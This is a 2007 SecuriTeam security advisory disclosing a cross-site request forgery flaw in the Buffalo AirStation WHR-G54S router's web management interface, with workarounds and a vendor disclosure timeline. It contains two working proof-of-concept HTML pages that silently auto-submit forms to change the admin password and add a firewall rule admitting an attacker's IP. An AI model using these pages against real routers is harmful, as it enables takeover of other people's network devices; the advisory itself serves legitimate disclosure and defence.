SecuriTeam - Buffalo AirStation WHR-G54S Web Management CSRF Vulnerability

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam
Beyond Security

SecuriTeam Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

During cursory inspection of WHR-G54S it was discovered that a cross site request forgery vulnerability exists in the management interface. Thus, it is possible for an attacker to perform any administrative action in the management interface. These include e.g. changing administrative password or adding new firewall rules.

Credit:
The information has been provided by Henri Lindberg - Smilehouse Oy.
The original article can be found at: http://www.louhi.fi/advisory/buffalo_070907.txt

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* WHR-G54S version 1.20

Buffalo AirStation WHR-G54S Ver.1.20 device management interface does not validate the origin of an HTTP request. If attacker is able to make user visit a hostile web page, a device can be controlled by submitting suitable forms. It is possible to add new users for example.

Successful attack requires that the attacker knows the management interface address for the target device. As authentication is done using HTTP Basic authentication, exploiting this vulnerability requires more effort compared to forms authentication.

Proof of Concept:
<html>
  <body onload="document.CSRF.submit()">
    <form name="CSRF" method="post"
    action="http://192.168.11.1/cgi-bin/cgi?req=inp&res=ap.html
    "style="display:none">

     <input name="ap" value="Evil">
     <input name="TEST_INPUT" value="1">
     <input name="edit_ropass" value="evil">
     <input name="edit_ropass2" value="evil">
     <input name="ropass" value="live">
     <input name="gupass" value="">
    </form>
  </body>
</html>

Note: ropass value is reversed edit_ropass value.

<html>
  <body onload="document.CSRF.submit()">
    <form name="CSRF" method="post"
    action="http://192.168.11.1/cgi-bin/cgi?req=inp&res=filter_ip.html"
    style="display:none">

<input name="sela" value="ACCEPT">
<input name="sel_direction" value="WAN">
<input name="H_sour_ip" value="1.1.1.1">
<input name="H_dest_ip" value="">
<input name="H_prt" value="all">
<input name="Do_ADDtop" value="Add%A0%28Head%29">

</form>
</body>
</html>

1.1.1.1 = attacker's IP address

Workaround:
Do not browse untrusted websites while using the management interface.

Log out after administering the device.

Disclosure Timeline:
XX July 2007 - Discovered the issue
15. August 2007 - Contacted Buffalo
17. August 2007 - Contacted Buffalo again.
7. September 2007 - No response from Vendor.
7. September 2007 - Advisory released

	Motorola Timbuktu Pro Stack Based Buffer Overflow
	Unisys Business Information Server Stack Buffer Overflow
	Adobe Shockwave Player Director File Parsing Pointer Overwrite
	Cisco Physical Access Gateway Denial of Service Vulnerability
	Cisco ASA Web VPN Multiple Vulnerabilities
	Cisco Video Surveillance Products Denial of Service
	Apple Safari File Protocol Handler Information Disclosure and Denial of Service
	HP OpenView Network Node Manager Execution of Arbitrary Code and DoS
	Kaspersky PDF Evasion All Products
	Ikarus Multiple Generic Evasions Using CAB ZIP or RAR Files
	FRISK Fprot Generic Bypass Using TAR Files
	CA Service Desk Tomcat Cross Site Scripting Vulnerability
	Apple Java CColorUIResource Pointer Derference Code Execution Vulnerability
	Mozilla Firefox Java Applet Loading Vulnerability
	Adobe Reader/Acrobat TrueType Font Processing Memory Corruption